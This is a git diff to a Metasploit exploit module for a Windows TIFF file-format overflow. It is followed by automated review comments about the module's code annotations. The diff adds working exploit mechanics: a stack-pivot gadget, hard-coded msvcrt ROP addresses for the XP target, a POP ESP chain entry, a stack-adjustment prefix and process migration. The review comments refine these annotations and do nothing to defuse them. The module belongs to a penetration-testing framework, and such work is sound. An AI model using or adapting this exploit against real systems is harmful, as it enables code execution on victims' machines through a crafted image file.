diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index fe317c739f..9767a3b198 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -69,11 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'Payload' =>
 {
- 'BadChars' => "\x00"
+ 'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff", # add esp, -80000; popad; popfd
+ 'StackAdjustment' => -3500,
+ 'BadChars' => "\x00"
 },
 'DefaultOptions' =>
 {
- 'ExitFunction' => "process"
+ 'ExitFunction' => "process",
+ 'PrependMigrate' => true
 },
 'Platform' => 'win',
 'Targets' =>
@@ -134,7 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 
 # Gain control of the call [eax+50h] instruction
- buf[0x4874, 4] = [0x41424344-0x50].pack('V')
+ # XCHG EAX, ESP; RETN msvcrt
+ buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
 
 buf
 end
@@ -147,8 +151,10 @@ class Metasploit3 < Msf::Exploit::Remote
 # Target address (200F0700):
 # 0:000> dd 200f06fc L4
 # 200f06fc ffffffff 36643ab8 d9c0d946 5af42474
- p = generate_rop_payload('msvcrt','',{'target'=>'xp'})
- p << payload.encoded
+ p = ''
+ p << [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt
+ p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
+ p << payload.encoded
 
 block = p
 block << "B" * (1024 - p.length)
@@ -227,7 +233,10 @@ class Metasploit3 < Msf::Exploit::Remote
 mscd << [0x00000002].pack('V')
 mscd << [0x00000003].pack('V')
 mscd << [0xfffffffe].pack('V')
- mscd << [0xffffffff].pack('V') * 52
+ mscd << [0xffffffff].pack('V') * 32 #52
+ mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
+ mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
+ mscd << [0xffffffff].pack('V') * 18
 mscd << @rop_payload
 
 mscd
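Review bot: The comment on the new `'PrependEncoder'` line does not match the bytes it annotates: `\x81\xc4\x80\xc7\xfe\xff` is the six-byte encoding of a single `add esp, imm32` (imm32 = 0xfffec780, i.e. -80000 decimal / -0x13880), and no `popad` or `popfd` byte is present in the string. The comment should describe only what the bytes encode, e.g. `# add esp, -80000 (0x13880)`, and state the sign convention, since "-80000" next to hex bytes is easy to misread as a hex value. The enclosing info hash starts and ends outside the hunk.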
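Review bot: The new comment `# XCHG EAX, ESP; RETN msvcrt` above `buf[0x4874, 4] = [0x200F0700-0x50].pack('V')` describes a gadget, but the constant written there is `0x200F0700`, which the next hunk's comments call the "Target address" where the chain is staged; the msvcrt gadget address itself is the separate `0x77c15ed5` entry added in that hunk. A comment should say what this constant is rather than what the first chain entry does, e.g. `# [eax+50h] resolves to the staged chain at 200F0700 (see target address notes below)`. The method that builds `buf` starts outside the hunk.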
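Review bot: The new `p << [0x77c15ed5].pack('V')` line hard-codes an address whose only annotation is `msvcrt`, and the last hunk does the same with `0x77c34fbf` and `0x200f0704`, while `generate_rop_payload` on the following line is told `'target'=>'xp'`; nothing records that these literals are valid only for the same msvcrt build the `'target'` selects, so the `Targets` table (outside this hunk) and these constants can drift apart without any error. Each literal should carry a comment naming the build it was taken from, e.g. `# msvcrt (xp target) — must match the 'target' given to generate_rop_payload`, or be looked up from the target entry instead of inlined. The method that builds `p` starts outside the hunk.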
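Review bot: `mscd << [0xffffffff].pack('V') * 32 #52` leaves the old count as a bare trailing comment, which reads as leftover dead text rather than an explanation; what the next three lines show is that 32 filler dwords, two address dwords and 18 more filler dwords still add up to the 52 the old line emitted, so the record length is unchanged. Replace `#52` with a comment that states that invariant, e.g. `# 32 + 2 + 18 = 52 dwords, same length as the original filler`, so a later edit to either count keeps the total in view. The method that builds `mscd` starts outside the hunk.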